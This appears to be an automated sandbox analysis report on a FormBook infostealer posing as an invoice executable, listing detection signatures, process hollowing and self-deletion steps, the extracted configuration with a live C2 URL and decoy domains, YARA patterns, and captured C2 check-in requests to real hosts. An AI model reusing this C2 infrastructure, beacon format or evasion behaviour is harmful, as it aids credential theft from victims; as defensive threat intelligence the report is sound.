Loading ...

Play interactive tourEdit tour

Analysis Report Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Overview

General Information

Sample Name:Proforma Invoice and Bank swift-REG.PI-0086547654.exe
Analysis ID:432567
MD5:b148ae414eb8a1b34a15cdb32c21f9ee
SHA1:25b78f76010cc34843352c78d4f8e07a28b46b32
SHA256:193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Proforma Invoice and Bank swift-REG.PI-0086547654.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
    • Proforma Invoice and Bank swift-REG.PI-0086547654.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 5888 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6764 cmdline: /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeVirustotal: Detection: 29%Perma Link
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeJoe Sandbox ML: detected
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.raserver.exe.51c7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.raserver.exe.30cde50.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000000.00000003.650872254.0000000009990000.00000004.00000001.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704631628.0000000000BDF000.00000040.00000001.sdmp, raserver.exe, 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49757 -> 121.254.178.252:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49757 -> 121.254.178.252:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49757 -> 121.254.178.252:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 35.205.61.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 35.205.61.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 35.205.61.67:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 37.48.65.148:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 37.48.65.148:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 37.48.65.148:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rebeccannemontgomery.net/dp3a/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.hireinone.xyz
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kladios.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.hireinone.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.closetofaurora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H HTTP/1.1Host: www.28ji.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kingguardgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.rebeccannemontgomery.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ HTTP/1.1Host: www.pecon.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
          Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1Host: www.theyogirunner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kladios.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.hireinone.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.closetofaurora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H HTTP/1.1Host: www.28ji.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.kingguardgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1Host: www.rebeccannemontgomery.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ HTTP/1.1Host: www.pecon.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.theyogirunner.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Jun 2021 12:36:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 70 33 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dp3a/ was not found on this server.</p></body></html>
          Source: raserver.exe, 00000007.00000002.915003619.0000000005342000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.659286527.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.676338868.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
